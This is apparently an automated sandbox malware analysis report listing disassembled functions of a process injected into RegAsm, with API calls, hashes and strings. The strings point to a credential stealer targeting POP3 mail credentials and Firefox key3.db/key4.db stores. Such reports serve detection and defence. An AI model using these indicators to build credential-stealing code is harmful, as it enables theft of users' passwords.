                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2126104762-0
                                                                                                                                                                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                • API String ID: 643879872-978417875
                                                                                                                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                • String ID: user_pref("
                                                                                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                                                                                • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                                                                                • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                Strings
                                                                                                                                                                                • strings, xrefs: 00408E27
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                • API String ID: 4036804644-4125592482
                                                                                                                                                                                • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                • API String ID: 3974279409-2190619648
                                                                                                                                                                                • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                • String ID: key3.db$key4.db
                                                                                                                                                                                • API String ID: 581844971-3557030128
                                                                                                                                                                                • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                                                                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                                                                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                • API String ID: 125969286-791839006
                                                                                                                                                                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                                                                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                Strings
                                                                                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                                                                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
